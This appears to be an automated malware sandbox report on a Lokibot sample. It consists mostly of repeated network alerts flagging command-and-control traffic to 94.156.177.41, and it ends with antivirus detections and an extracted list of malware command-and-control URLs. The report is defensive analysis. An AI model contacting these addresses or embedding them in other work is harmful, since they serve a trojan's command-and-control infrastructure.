              2025-01-11T07:46:18.636150+010020243181Malware Command and Control Activity Detected192.168.2.55010394.156.177.4180TCP
              2025-01-11T07:46:19.502502+010020243181Malware Command and Control Activity Detected192.168.2.55010494.156.177.4180TCP
              2025-01-11T07:46:20.387384+010020243181Malware Command and Control Activity Detected192.168.2.55010594.156.177.4180TCP
              2025-01-11T07:46:21.299723+010020243181Malware Command and Control Activity Detected192.168.2.55010694.156.177.4180TCP
              2025-01-11T07:46:22.345032+010020243181Malware Command and Control Activity Detected192.168.2.55010794.156.177.4180TCP
              2025-01-11T07:46:23.228495+010020243181Malware Command and Control Activity Detected192.168.2.55010894.156.177.4180TCP
              2025-01-11T07:46:24.079217+010020243181Malware Command and Control Activity Detected192.168.2.55010994.156.177.4180TCP
              2025-01-11T07:46:24.943363+010020243181Malware Command and Control Activity Detected192.168.2.55011094.156.177.4180TCP
              2025-01-11T07:46:25.812030+010020243181Malware Command and Control Activity Detected192.168.2.55011194.156.177.4180TCP
              2025-01-11T07:46:26.689397+010020243181Malware Command and Control Activity Detected192.168.2.55011294.156.177.4180TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2025-01-11T07:44:25.599550+010020216411A Network Trojan was detected192.168.2.54970794.156.177.4180TCP
              2025-01-11T07:44:26.514901+010020216411A Network Trojan was detected192.168.2.54970894.156.177.4180TCP
              2025-01-11T07:44:27.307244+010020216411A Network Trojan was detected192.168.2.54970994.156.177.4180TCP
              2025-01-11T07:44:28.191011+010020216411A Network Trojan was detected192.168.2.54971194.156.177.4180TCP
              2025-01-11T07:44:29.096261+010020216411A Network Trojan was detected192.168.2.54971394.156.177.4180TCP
              2025-01-11T07:44:30.130805+010020216411A Network Trojan was detected192.168.2.54971494.156.177.4180TCP
              2025-01-11T07:44:31.013403+010020216411A Network Trojan was detected192.168.2.54971594.156.177.4180TCP
              2025-01-11T07:44:32.794115+010020216411A Network Trojan was detected192.168.2.54971694.156.177.4180TCP
              2025-01-11T07:44:33.799410+010020216411A Network Trojan was detected192.168.2.54971794.156.177.4180TCP
              2025-01-11T07:44:34.671202+010020216411A Network Trojan was detected192.168.2.54971894.156.177.4180TCP
              2025-01-11T07:44:35.543288+010020216411A Network Trojan was detected192.168.2.54971994.156.177.4180TCP
              2025-01-11T07:44:36.441284+010020216411A Network Trojan was detected192.168.2.54972094.156.177.4180TCP
              2025-01-11T07:44:37.566875+010020216411A Network Trojan was detected192.168.2.54972194.156.177.4180TCP
              2025-01-11T07:44:38.454563+010020216411A Network Trojan was detected192.168.2.54972294.156.177.4180TCP
              2025-01-11T07:44:39.345173+010020216411A Network Trojan was detected192.168.2.54972494.156.177.4180TCP
              2025-01-11T07:44:40.457078+010020216411A Network Trojan was detected192.168.2.54972594.156.177.4180TCP
              2025-01-11T07:44:41.331671+010020216411A Network Trojan was detected192.168.2.54973094.156.177.4180TCP
              2025-01-11T07:44:42.253637+010020216411A Network Trojan was detected192.168.2.54973894.156.177.4180TCP
              2025-01-11T07:44:43.098513+010020216411A Network Trojan was detected192.168.2.54974394.156.177.4180TCP
              2025-01-11T07:44:43.980050+010020216411A Network Trojan was detected192.168.2.54974994.156.177.4180TCP
              2025-01-11T07:44:44.852549+010020216411A Network Trojan was detected192.168.2.54975594.156.177.4180TCP
              2025-01-11T07:44:45.728633+010020216411A Network Trojan was detected192.168.2.54976194.156.177.4180TCP
              2025-01-11T07:44:46.611946+010020216411A Network Trojan was detected192.168.2.54977194.156.177.4180TCP
              2025-01-11T07:44:47.470301+010020216411A Network Trojan was detected192.168.2.54977794.156.177.4180TCP
              2025-01-11T07:44:48.343700+010020216411A Network Trojan was detected192.168.2.54978494.156.177.4180TCP
              2025-01-11T07:44:49.359567+010020216411A Network Trojan was detected192.168.2.54979094.156.177.4180TCP
              2025-01-11T07:44:50.222647+010020216411A Network Trojan was detected192.168.2.54979694.156.177.4180TCP
              2025-01-11T07:44:51.232327+010020216411A Network Trojan was detected192.168.2.54980494.156.177.4180TCP
              2025-01-11T07:44:52.093577+010020216411A Network Trojan was detected192.168.2.54981194.156.177.4180TCP
              2025-01-11T07:44:52.995437+010020216411A Network Trojan was detected192.168.2.54981694.156.177.4180TCP
              2025-01-11T07:44:53.931455+010020216411A Network Trojan was detected192.168.2.54982194.156.177.4180TCP
              2025-01-11T07:44:54.835228+010020216411A Network Trojan was detected192.168.2.54982694.156.177.4180TCP
              2025-01-11T07:44:55.697158+010020216411A Network Trojan was detected192.168.2.54983494.156.177.4180TCP
              2025-01-11T07:44:56.576534+010020216411A Network Trojan was detected192.168.2.54984094.156.177.4180TCP
              2025-01-11T07:44:57.442816+010020216411A Network Trojan was detected192.168.2.54984994.156.177.4180TCP
              2025-01-11T07:44:58.295544+010020216411A Network Trojan was detected192.168.2.54985594.156.177.4180TCP
              2025-01-11T07:44:59.483479+010020216411A Network Trojan was detected192.168.2.54986294.156.177.4180TCP
              2025-01-11T07:45:00.369812+010020216411A Network Trojan was detected192.168.2.54986994.156.177.4180TCP
              2025-01-11T07:45:01.246794+010020216411A Network Trojan was detected192.168.2.54987894.156.177.4180TCP
              2025-01-11T07:45:02.314357+010020216411A Network Trojan was detected192.168.2.54988494.156.177.4180TCP
              2025-01-11T07:45:03.331453+010020216411A Network Trojan was detected192.168.2.54989194.156.177.4180TCP
              2025-01-11T07:45:04.209206+010020216411A Network Trojan was detected192.168.2.54989994.156.177.4180TCP
              2025-01-11T07:45:05.082273+010020216411A Network Trojan was detected192.168.2.54990594.156.177.4180TCP
              2025-01-11T07:45:05.957442+010020216411A Network Trojan was detected192.168.2.54991194.156.177.4180TCP
              2025-01-11T07:45:07.173718+010020216411A Network Trojan was detected192.168.2.54991994.156.177.4180TCP
              2025-01-11T07:45:08.037685+010020216411A Network Trojan was detected192.168.2.54992894.156.177.4180TCP
              2025-01-11T07:45:08.914118+010020216411A Network Trojan was detected192.168.2.54993494.156.177.4180TCP
              2025-01-11T07:45:09.933380+010020216411A Network Trojan was detected192.168.2.54993994.156.177.4180TCP
              2025-01-11T07:45:10.851770+010020216411A Network Trojan was detected192.168.2.54994594.156.177.4180TCP
              2025-01-11T07:45:11.717555+010020216411A Network Trojan was detected192.168.2.54995394.156.177.4180TCP
              2025-01-11T07:45:12.578126+010020216411A Network Trojan was detected192.168.2.54996194.156.177.4180TCP
              2025-01-11T07:45:13.478552+010020216411A Network Trojan was detected192.168.2.54996894.156.177.4180TCP
              2025-01-11T07:45:14.340906+010020216411A Network Trojan was detected192.168.2.54997494.156.177.4180TCP
              2025-01-11T07:45:15.208568+010020216411A Network Trojan was detected192.168.2.54998094.156.177.4180TCP
              2025-01-11T07:45:16.076063+010020216411A Network Trojan was detected192.168.2.54998694.156.177.4180TCP
              2025-01-11T07:45:16.950781+010020216411A Network Trojan was detected192.168.2.54999394.156.177.4180TCP
              2025-01-11T07:45:17.828451+010020216411A Network Trojan was detected192.168.2.55000294.156.177.4180TCP
              2025-01-11T07:45:18.943087+010020216411A Network Trojan was detected192.168.2.55001094.156.177.4180TCP
              2025-01-11T07:45:19.816581+010020216411A Network Trojan was detected192.168.2.55001694.156.177.4180TCP
              2025-01-11T07:45:20.695534+010020216411A Network Trojan was detected192.168.2.55002294.156.177.4180TCP
              2025-01-11T07:45:21.906791+010020216411A Network Trojan was detected192.168.2.55002794.156.177.4180TCP
              2025-01-11T07:45:22.801196+010020216411A Network Trojan was detected192.168.2.55003794.156.177.4180TCP
              2025-01-11T07:45:23.654933+010020216411A Network Trojan was detected192.168.2.55004394.156.177.4180TCP
              2025-01-11T07:45:24.666068+010020216411A Network Trojan was detected192.168.2.55004494.156.177.4180TCP
              2025-01-11T07:45:25.549065+010020216411A Network Trojan was detected192.168.2.55004594.156.177.4180TCP
              2025-01-11T07:45:26.431338+010020216411A Network Trojan was detected192.168.2.55004694.156.177.4180TCP
              2025-01-11T07:45:27.499770+010020216411A Network Trojan was detected192.168.2.55004794.156.177.4180TCP
              2025-01-11T07:45:28.375675+010020216411A Network Trojan was detected192.168.2.55004894.156.177.4180TCP
              2025-01-11T07:45:29.280517+010020216411A Network Trojan was detected192.168.2.55004994.156.177.4180TCP
              2025-01-11T07:45:30.122846+010020216411A Network Trojan was detected192.168.2.55005094.156.177.4180TCP
              2025-01-11T07:45:30.991478+010020216411A Network Trojan was detected192.168.2.55005194.156.177.4180TCP
              2025-01-11T07:45:31.859651+010020216411A Network Trojan was detected192.168.2.55005294.156.177.4180TCP
              2025-01-11T07:45:32.741029+010020216411A Network Trojan was detected192.168.2.55005394.156.177.4180TCP
              2025-01-11T07:45:33.607086+010020216411A Network Trojan was detected192.168.2.55005494.156.177.4180TCP
              2025-01-11T07:45:34.487775+010020216411A Network Trojan was detected192.168.2.55005594.156.177.4180TCP
              2025-01-11T07:45:35.345550+010020216411A Network Trojan was detected192.168.2.55005694.156.177.4180TCP
              2025-01-11T07:45:36.525051+010020216411A Network Trojan was detected192.168.2.55005794.156.177.4180TCP
              2025-01-11T07:45:37.400062+010020216411A Network Trojan was detected192.168.2.55005894.156.177.4180TCP
              2025-01-11T07:45:38.410807+010020216411A Network Trojan was detected192.168.2.55005994.156.177.4180TCP
              2025-01-11T07:45:39.302388+010020216411A Network Trojan was detected192.168.2.55006094.156.177.4180TCP
              2025-01-11T07:45:40.165796+010020216411A Network Trojan was detected192.168.2.55006194.156.177.4180TCP
              2025-01-11T07:45:41.015055+010020216411A Network Trojan was detected192.168.2.55006294.156.177.4180TCP
              2025-01-11T07:45:42.032602+010020216411A Network Trojan was detected192.168.2.55006394.156.177.4180TCP
              2025-01-11T07:45:42.904942+010020216411A Network Trojan was detected192.168.2.55006494.156.177.4180TCP
              2025-01-11T07:45:43.761690+010020216411A Network Trojan was detected192.168.2.55006594.156.177.4180TCP
              2025-01-11T07:45:44.721124+010020216411A Network Trojan was detected192.168.2.55006694.156.177.4180TCP
              2025-01-11T07:45:45.593770+010020216411A Network Trojan was detected192.168.2.55006794.156.177.4180TCP
              2025-01-11T07:45:46.450873+010020216411A Network Trojan was detected192.168.2.55006894.156.177.4180TCP
              2025-01-11T07:45:47.341627+010020216411A Network Trojan was detected192.168.2.55006994.156.177.4180TCP
              2025-01-11T07:45:48.223334+010020216411A Network Trojan was detected192.168.2.55007094.156.177.4180TCP
              2025-01-11T07:45:49.103767+010020216411A Network Trojan was detected192.168.2.55007194.156.177.4180TCP
              2025-01-11T07:45:49.999889+010020216411A Network Trojan was detected192.168.2.55007294.156.177.4180TCP
              2025-01-11T07:45:50.897746+010020216411A Network Trojan was detected192.168.2.55007394.156.177.4180TCP
              2025-01-11T07:45:51.767772+010020216411A Network Trojan was detected192.168.2.55007494.156.177.4180TCP
              2025-01-11T07:45:52.610435+010020216411A Network Trojan was detected192.168.2.55007594.156.177.4180TCP
              2025-01-11T07:45:53.849528+010020216411A Network Trojan was detected192.168.2.55007694.156.177.4180TCP
              2025-01-11T07:45:54.733799+010020216411A Network Trojan was detected192.168.2.55007794.156.177.4180TCP
              2025-01-11T07:45:55.638595+010020216411A Network Trojan was detected192.168.2.55007894.156.177.4180TCP
              2025-01-11T07:45:56.514453+010020216411A Network Trojan was detected192.168.2.55007994.156.177.4180TCP
              2025-01-11T07:45:57.364760+010020216411A Network Trojan was detected192.168.2.55008094.156.177.4180TCP
              2025-01-11T07:45:58.382542+010020216411A Network Trojan was detected192.168.2.55008194.156.177.4180TCP
              2025-01-11T07:45:59.299658+010020216411A Network Trojan was detected192.168.2.55008294.156.177.4180TCP
              2025-01-11T07:46:00.145771+010020216411A Network Trojan was detected192.168.2.55008394.156.177.4180TCP
              2025-01-11T07:46:00.982126+010020216411A Network Trojan was detected192.168.2.55008494.156.177.4180TCP
              2025-01-11T07:46:01.873444+010020216411A Network Trojan was detected192.168.2.55008594.156.177.4180TCP
              2025-01-11T07:46:02.873702+010020216411A Network Trojan was detected192.168.2.55008694.156.177.4180TCP
              2025-01-11T07:46:03.722760+010020216411A Network Trojan was detected192.168.2.55008794.156.177.4180TCP
              2025-01-11T07:46:04.607701+010020216411A Network Trojan was detected192.168.2.55008894.156.177.4180TCP
              2025-01-11T07:46:05.489996+010020216411A Network Trojan was detected192.168.2.55008994.156.177.4180TCP
              2025-01-11T07:46:06.353603+010020216411A Network Trojan was detected192.168.2.55009094.156.177.4180TCP
              2025-01-11T07:46:07.255437+010020216411A Network Trojan was detected192.168.2.55009194.156.177.4180TCP
              2025-01-11T07:46:08.138322+010020216411A Network Trojan was detected192.168.2.55009294.156.177.4180TCP
              2025-01-11T07:46:09.033339+010020216411A Network Trojan was detected192.168.2.55009394.156.177.4180TCP
              2025-01-11T07:46:09.910608+010020216411A Network Trojan was detected192.168.2.55009494.156.177.4180TCP
              2025-01-11T07:46:10.798044+010020216411A Network Trojan was detected192.168.2.55009594.156.177.4180TCP
              2025-01-11T07:46:11.690985+010020216411A Network Trojan was detected192.168.2.55009694.156.177.4180TCP
              2025-01-11T07:46:12.563647+010020216411A Network Trojan was detected192.168.2.55009794.156.177.4180TCP
              2025-01-11T07:46:13.437852+010020216411A Network Trojan was detected192.168.2.55009894.156.177.4180TCP
              2025-01-11T07:46:14.311717+010020216411A Network Trojan was detected192.168.2.55009994.156.177.4180TCP
              2025-01-11T07:46:15.196451+010020216411A Network Trojan was detected192.168.2.55010094.156.177.4180TCP
              2025-01-11T07:46:16.066977+010020216411A Network Trojan was detected192.168.2.55010194.156.177.4180TCP
              2025-01-11T07:46:16.947180+010020216411A Network Trojan was detected192.168.2.55010294.156.177.4180TCP
              2025-01-11T07:46:17.795814+010020216411A Network Trojan was detected192.168.2.55010394.156.177.4180TCP
              2025-01-11T07:46:18.795869+010020216411A Network Trojan was detected192.168.2.55010494.156.177.4180TCP
              2025-01-11T07:46:19.678030+010020216411A Network Trojan was detected192.168.2.55010594.156.177.4180TCP
              2025-01-11T07:46:20.545406+010020216411A Network Trojan was detected192.168.2.55010694.156.177.4180TCP
              2025-01-11T07:46:21.450794+010020216411A Network Trojan was detected192.168.2.55010794.156.177.4180TCP
              2025-01-11T07:46:22.498284+010020216411A Network Trojan was detected192.168.2.55010894.156.177.4180TCP
              2025-01-11T07:46:23.372578+010020216411A Network Trojan was detected192.168.2.55010994.156.177.4180TCP
              2025-01-11T07:46:24.220617+010020216411A Network Trojan was detected192.168.2.55011094.156.177.4180TCP
              2025-01-11T07:46:25.095420+010020216411A Network Trojan was detected192.168.2.55011194.156.177.4180TCP
              2025-01-11T07:46:25.958653+010020216411A Network Trojan was detected192.168.2.55011294.156.177.4180TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2025-01-11T07:44:25.599550+010028257661Malware Command and Control Activity Detected192.168.2.54970794.156.177.4180TCP
              2025-01-11T07:44:26.514901+010028257661Malware Command and Control Activity Detected192.168.2.54970894.156.177.4180TCP
              2025-01-11T07:44:27.307244+010028257661Malware Command and Control Activity Detected192.168.2.54970994.156.177.4180TCP
              2025-01-11T07:44:28.191011+010028257661Malware Command and Control Activity Detected192.168.2.54971194.156.177.4180TCP
              2025-01-11T07:44:29.096261+010028257661Malware Command and Control Activity Detected192.168.2.54971394.156.177.4180TCP
              2025-01-11T07:44:30.130805+010028257661Malware Command and Control Activity Detected192.168.2.54971494.156.177.4180TCP
              2025-01-11T07:44:31.013403+010028257661Malware Command and Control Activity Detected192.168.2.54971594.156.177.4180TCP
              2025-01-11T07:44:32.794115+010028257661Malware Command and Control Activity Detected192.168.2.54971694.156.177.4180TCP
              2025-01-11T07:44:33.799410+010028257661Malware Command and Control Activity Detected192.168.2.54971794.156.177.4180TCP
              2025-01-11T07:44:34.671202+010028257661Malware Command and Control Activity Detected192.168.2.54971894.156.177.4180TCP
              2025-01-11T07:44:35.543288+010028257661Malware Command and Control Activity Detected192.168.2.54971994.156.177.4180TCP
              2025-01-11T07:44:36.441284+010028257661Malware Command and Control Activity Detected192.168.2.54972094.156.177.4180TCP
              2025-01-11T07:44:37.566875+010028257661Malware Command and Control Activity Detected192.168.2.54972194.156.177.4180TCP
              2025-01-11T07:44:38.454563+010028257661Malware Command and Control Activity Detected192.168.2.54972294.156.177.4180TCP
              2025-01-11T07:44:39.345173+010028257661Malware Command and Control Activity Detected192.168.2.54972494.156.177.4180TCP
              2025-01-11T07:44:40.457078+010028257661Malware Command and Control Activity Detected192.168.2.54972594.156.177.4180TCP
              2025-01-11T07:44:41.331671+010028257661Malware Command and Control Activity Detected192.168.2.54973094.156.177.4180TCP
              2025-01-11T07:44:42.253637+010028257661Malware Command and Control Activity Detected192.168.2.54973894.156.177.4180TCP
              2025-01-11T07:44:43.098513+010028257661Malware Command and Control Activity Detected192.168.2.54974394.156.177.4180TCP
              2025-01-11T07:44:43.980050+010028257661Malware Command and Control Activity Detected192.168.2.54974994.156.177.4180TCP
              2025-01-11T07:44:44.852549+010028257661Malware Command and Control Activity Detected192.168.2.54975594.156.177.4180TCP
              2025-01-11T07:44:45.728633+010028257661Malware Command and Control Activity Detected192.168.2.54976194.156.177.4180TCP
              2025-01-11T07:44:46.611946+010028257661Malware Command and Control Activity Detected192.168.2.54977194.156.177.4180TCP
              2025-01-11T07:44:47.470301+010028257661Malware Command and Control Activity Detected192.168.2.54977794.156.177.4180TCP
              2025-01-11T07:44:48.343700+010028257661Malware Command and Control Activity Detected192.168.2.54978494.156.177.4180TCP
              2025-01-11T07:44:49.359567+010028257661Malware Command and Control Activity Detected192.168.2.54979094.156.177.4180TCP
              2025-01-11T07:44:50.222647+010028257661Malware Command and Control Activity Detected192.168.2.54979694.156.177.4180TCP
              2025-01-11T07:44:51.232327+010028257661Malware Command and Control Activity Detected192.168.2.54980494.156.177.4180TCP
              2025-01-11T07:44:52.093577+010028257661Malware Command and Control Activity Detected192.168.2.54981194.156.177.4180TCP
              2025-01-11T07:44:52.995437+010028257661Malware Command and Control Activity Detected192.168.2.54981694.156.177.4180TCP
              2025-01-11T07:44:53.931455+010028257661Malware Command and Control Activity Detected192.168.2.54982194.156.177.4180TCP
              2025-01-11T07:44:54.835228+010028257661Malware Command and Control Activity Detected192.168.2.54982694.156.177.4180TCP
              2025-01-11T07:44:55.697158+010028257661Malware Command and Control Activity Detected192.168.2.54983494.156.177.4180TCP
              2025-01-11T07:44:56.576534+010028257661Malware Command and Control Activity Detected192.168.2.54984094.156.177.4180TCP
              2025-01-11T07:44:57.442816+010028257661Malware Command and Control Activity Detected192.168.2.54984994.156.177.4180TCP
              2025-01-11T07:44:58.295544+010028257661Malware Command and Control Activity Detected192.168.2.54985594.156.177.4180TCP
              2025-01-11T07:44:59.483479+010028257661Malware Command and Control Activity Detected192.168.2.54986294.156.177.4180TCP
              2025-01-11T07:45:00.369812+010028257661Malware Command and Control Activity Detected192.168.2.54986994.156.177.4180TCP
              2025-01-11T07:45:01.246794+010028257661Malware Command and Control Activity Detected192.168.2.54987894.156.177.4180TCP
              2025-01-11T07:45:02.314357+010028257661Malware Command and Control Activity Detected192.168.2.54988494.156.177.4180TCP
              2025-01-11T07:45:03.331453+010028257661Malware Command and Control Activity Detected192.168.2.54989194.156.177.4180TCP
              2025-01-11T07:45:04.209206+010028257661Malware Command and Control Activity Detected192.168.2.54989994.156.177.4180TCP
              2025-01-11T07:45:05.082273+010028257661Malware Command and Control Activity Detected192.168.2.54990594.156.177.4180TCP
              2025-01-11T07:45:05.957442+010028257661Malware Command and Control Activity Detected192.168.2.54991194.156.177.4180TCP
              2025-01-11T07:45:07.173718+010028257661Malware Command and Control Activity Detected192.168.2.54991994.156.177.4180TCP
              2025-01-11T07:45:08.037685+010028257661Malware Command and Control Activity Detected192.168.2.54992894.156.177.4180TCP
              2025-01-11T07:45:08.914118+010028257661Malware Command and Control Activity Detected192.168.2.54993494.156.177.4180TCP
              2025-01-11T07:45:09.933380+010028257661Malware Command and Control Activity Detected192.168.2.54993994.156.177.4180TCP
              2025-01-11T07:45:10.851770+010028257661Malware Command and Control Activity Detected192.168.2.54994594.156.177.4180TCP
              2025-01-11T07:45:11.717555+010028257661Malware Command and Control Activity Detected192.168.2.54995394.156.177.4180TCP
              2025-01-11T07:45:12.578126+010028257661Malware Command and Control Activity Detected192.168.2.54996194.156.177.4180TCP
              2025-01-11T07:45:13.478552+010028257661Malware Command and Control Activity Detected192.168.2.54996894.156.177.4180TCP
              2025-01-11T07:45:14.340906+010028257661Malware Command and Control Activity Detected192.168.2.54997494.156.177.4180TCP
              2025-01-11T07:45:15.208568+010028257661Malware Command and Control Activity Detected192.168.2.54998094.156.177.4180TCP
              2025-01-11T07:45:16.076063+010028257661Malware Command and Control Activity Detected192.168.2.54998694.156.177.4180TCP
              2025-01-11T07:45:16.950781+010028257661Malware Command and Control Activity Detected192.168.2.54999394.156.177.4180TCP
              2025-01-11T07:45:17.828451+010028257661Malware Command and Control Activity Detected192.168.2.55000294.156.177.4180TCP
              2025-01-11T07:45:18.943087+010028257661Malware Command and Control Activity Detected192.168.2.55001094.156.177.4180TCP
              2025-01-11T07:45:19.816581+010028257661Malware Command and Control Activity Detected192.168.2.55001694.156.177.4180TCP
              2025-01-11T07:45:20.695534+010028257661Malware Command and Control Activity Detected192.168.2.55002294.156.177.4180TCP
              2025-01-11T07:45:21.906791+010028257661Malware Command and Control Activity Detected192.168.2.55002794.156.177.4180TCP
              2025-01-11T07:45:22.801196+010028257661Malware Command and Control Activity Detected192.168.2.55003794.156.177.4180TCP
              2025-01-11T07:45:23.654933+010028257661Malware Command and Control Activity Detected192.168.2.55004394.156.177.4180TCP
              2025-01-11T07:45:24.666068+010028257661Malware Command and Control Activity Detected192.168.2.55004494.156.177.4180TCP
              2025-01-11T07:45:25.549065+010028257661Malware Command and Control Activity Detected192.168.2.55004594.156.177.4180TCP
              2025-01-11T07:45:26.431338+010028257661Malware Command and Control Activity Detected192.168.2.55004694.156.177.4180TCP
              2025-01-11T07:45:27.499770+010028257661Malware Command and Control Activity Detected192.168.2.55004794.156.177.4180TCP
              2025-01-11T07:45:28.375675+010028257661Malware Command and Control Activity Detected192.168.2.55004894.156.177.4180TCP
              2025-01-11T07:45:29.280517+010028257661Malware Command and Control Activity Detected192.168.2.55004994.156.177.4180TCP
              2025-01-11T07:45:30.122846+010028257661Malware Command and Control Activity Detected192.168.2.55005094.156.177.4180TCP
              2025-01-11T07:45:30.991478+010028257661Malware Command and Control Activity Detected192.168.2.55005194.156.177.4180TCP
              2025-01-11T07:45:31.859651+010028257661Malware Command and Control Activity Detected192.168.2.55005294.156.177.4180TCP
              2025-01-11T07:45:32.741029+010028257661Malware Command and Control Activity Detected192.168.2.55005394.156.177.4180TCP
              2025-01-11T07:45:33.607086+010028257661Malware Command and Control Activity Detected192.168.2.55005494.156.177.4180TCP
              2025-01-11T07:45:34.487775+010028257661Malware Command and Control Activity Detected192.168.2.55005594.156.177.4180TCP
              2025-01-11T07:45:35.345550+010028257661Malware Command and Control Activity Detected192.168.2.55005694.156.177.4180TCP
              2025-01-11T07:45:36.525051+010028257661Malware Command and Control Activity Detected192.168.2.55005794.156.177.4180TCP
              2025-01-11T07:45:37.400062+010028257661Malware Command and Control Activity Detected192.168.2.55005894.156.177.4180TCP
              2025-01-11T07:45:38.410807+010028257661Malware Command and Control Activity Detected192.168.2.55005994.156.177.4180TCP
              2025-01-11T07:45:39.302388+010028257661Malware Command and Control Activity Detected192.168.2.55006094.156.177.4180TCP
              2025-01-11T07:45:40.165796+010028257661Malware Command and Control Activity Detected192.168.2.55006194.156.177.4180TCP
              2025-01-11T07:45:41.015055+010028257661Malware Command and Control Activity Detected192.168.2.55006294.156.177.4180TCP
              2025-01-11T07:45:42.032602+010028257661Malware Command and Control Activity Detected192.168.2.55006394.156.177.4180TCP
              2025-01-11T07:45:42.904942+010028257661Malware Command and Control Activity Detected192.168.2.55006494.156.177.4180TCP
              2025-01-11T07:45:43.761690+010028257661Malware Command and Control Activity Detected192.168.2.55006594.156.177.4180TCP
              2025-01-11T07:45:44.721124+010028257661Malware Command and Control Activity Detected192.168.2.55006694.156.177.4180TCP
              2025-01-11T07:45:45.593770+010028257661Malware Command and Control Activity Detected192.168.2.55006794.156.177.4180TCP
              2025-01-11T07:45:46.450873+010028257661Malware Command and Control Activity Detected192.168.2.55006894.156.177.4180TCP
              2025-01-11T07:45:47.341627+010028257661Malware Command and Control Activity Detected192.168.2.55006994.156.177.4180TCP
              2025-01-11T07:45:48.223334+010028257661Malware Command and Control Activity Detected192.168.2.55007094.156.177.4180TCP
              2025-01-11T07:45:49.103767+010028257661Malware Command and Control Activity Detected192.168.2.55007194.156.177.4180TCP
              2025-01-11T07:45:49.999889+010028257661Malware Command and Control Activity Detected192.168.2.55007294.156.177.4180TCP
              2025-01-11T07:45:50.897746+010028257661Malware Command and Control Activity Detected192.168.2.55007394.156.177.4180TCP
              2025-01-11T07:45:51.767772+010028257661Malware Command and Control Activity Detected192.168.2.55007494.156.177.4180TCP
              2025-01-11T07:45:52.610435+010028257661Malware Command and Control Activity Detected192.168.2.55007594.156.177.4180TCP
              2025-01-11T07:45:53.849528+010028257661Malware Command and Control Activity Detected192.168.2.55007694.156.177.4180TCP
              2025-01-11T07:45:54.733799+010028257661Malware Command and Control Activity Detected192.168.2.55007794.156.177.4180TCP
              2025-01-11T07:45:55.638595+010028257661Malware Command and Control Activity Detected192.168.2.55007894.156.177.4180TCP
              2025-01-11T07:45:56.514453+010028257661Malware Command and Control Activity Detected192.168.2.55007994.156.177.4180TCP
              2025-01-11T07:45:57.364760+010028257661Malware Command and Control Activity Detected192.168.2.55008094.156.177.4180TCP
              2025-01-11T07:45:58.382542+010028257661Malware Command and Control Activity Detected192.168.2.55008194.156.177.4180TCP
              2025-01-11T07:45:59.299658+010028257661Malware Command and Control Activity Detected192.168.2.55008294.156.177.4180TCP
              2025-01-11T07:46:00.145771+010028257661Malware Command and Control Activity Detected192.168.2.55008394.156.177.4180TCP
              2025-01-11T07:46:00.982126+010028257661Malware Command and Control Activity Detected192.168.2.55008494.156.177.4180TCP
              2025-01-11T07:46:01.873444+010028257661Malware Command and Control Activity Detected192.168.2.55008594.156.177.4180TCP
              2025-01-11T07:46:02.873702+010028257661Malware Command and Control Activity Detected192.168.2.55008694.156.177.4180TCP
              2025-01-11T07:46:03.722760+010028257661Malware Command and Control Activity Detected192.168.2.55008794.156.177.4180TCP
              2025-01-11T07:46:04.607701+010028257661Malware Command and Control Activity Detected192.168.2.55008894.156.177.4180TCP
              2025-01-11T07:46:05.489996+010028257661Malware Command and Control Activity Detected192.168.2.55008994.156.177.4180TCP
              2025-01-11T07:46:06.353603+010028257661Malware Command and Control Activity Detected192.168.2.55009094.156.177.4180TCP
              2025-01-11T07:46:07.255437+010028257661Malware Command and Control Activity Detected192.168.2.55009194.156.177.4180TCP
              2025-01-11T07:46:08.138322+010028257661Malware Command and Control Activity Detected192.168.2.55009294.156.177.4180TCP
              2025-01-11T07:46:09.033339+010028257661Malware Command and Control Activity Detected192.168.2.55009394.156.177.4180TCP
              2025-01-11T07:46:09.910608+010028257661Malware Command and Control Activity Detected192.168.2.55009494.156.177.4180TCP
              2025-01-11T07:46:10.798044+010028257661Malware Command and Control Activity Detected192.168.2.55009594.156.177.4180TCP
              2025-01-11T07:46:11.690985+010028257661Malware Command and Control Activity Detected192.168.2.55009694.156.177.4180TCP
              2025-01-11T07:46:12.563647+010028257661Malware Command and Control Activity Detected192.168.2.55009794.156.177.4180TCP
              2025-01-11T07:46:13.437852+010028257661Malware Command and Control Activity Detected192.168.2.55009894.156.177.4180TCP
              2025-01-11T07:46:14.311717+010028257661Malware Command and Control Activity Detected192.168.2.55009994.156.177.4180TCP
              2025-01-11T07:46:15.196451+010028257661Malware Command and Control Activity Detected192.168.2.55010094.156.177.4180TCP
              2025-01-11T07:46:16.066977+010028257661Malware Command and Control Activity Detected192.168.2.55010194.156.177.4180TCP
              2025-01-11T07:46:16.947180+010028257661Malware Command and Control Activity Detected192.168.2.55010294.156.177.4180TCP
              2025-01-11T07:46:17.795814+010028257661Malware Command and Control Activity Detected192.168.2.55010394.156.177.4180TCP
              2025-01-11T07:46:18.795869+010028257661Malware Command and Control Activity Detected192.168.2.55010494.156.177.4180TCP
              2025-01-11T07:46:19.678030+010028257661Malware Command and Control Activity Detected192.168.2.55010594.156.177.4180TCP
              2025-01-11T07:46:20.545406+010028257661Malware Command and Control Activity Detected192.168.2.55010694.156.177.4180TCP
              2025-01-11T07:46:21.450794+010028257661Malware Command and Control Activity Detected192.168.2.55010794.156.177.4180TCP
              2025-01-11T07:46:22.498284+010028257661Malware Command and Control Activity Detected192.168.2.55010894.156.177.4180TCP
              2025-01-11T07:46:23.372578+010028257661Malware Command and Control Activity Detected192.168.2.55010994.156.177.4180TCP
              2025-01-11T07:46:24.220617+010028257661Malware Command and Control Activity Detected192.168.2.55011094.156.177.4180TCP
              2025-01-11T07:46:25.095420+010028257661Malware Command and Control Activity Detected192.168.2.55011194.156.177.4180TCP
              2025-01-11T07:46:25.958653+010028257661Malware Command and Control Activity Detected192.168.2.55011294.156.177.4180TCP

              Click to jump to signature section

              Show All Signature Results

              AV Detection

              barindex
              Source: http://94.156.177.41/simple/five/fre.phpAvira URL Cloud: Label: malware
              Source: 0000000A.00000002.2110971513.0000000003934000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: Lokibot {"C2 list": ["http://kbfvzoboss.bid/alien/fre.php", "http://alphastand.trade/alien/fre.php", "http://alphastand.win/alien/fre.php", "http://alphastand.top/alien/fre.php"]}
              Source: C:\Users\user\AppData\Roaming\HxQXdrrQ.exeReversingLabs: Detection: 79%
              Source: YvVDV4cbjy.exeVirustotal: Detection: 74%Perma Link
              Source: YvVDV4cbjy.exeReversingLabs: Detection: 79%
              Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
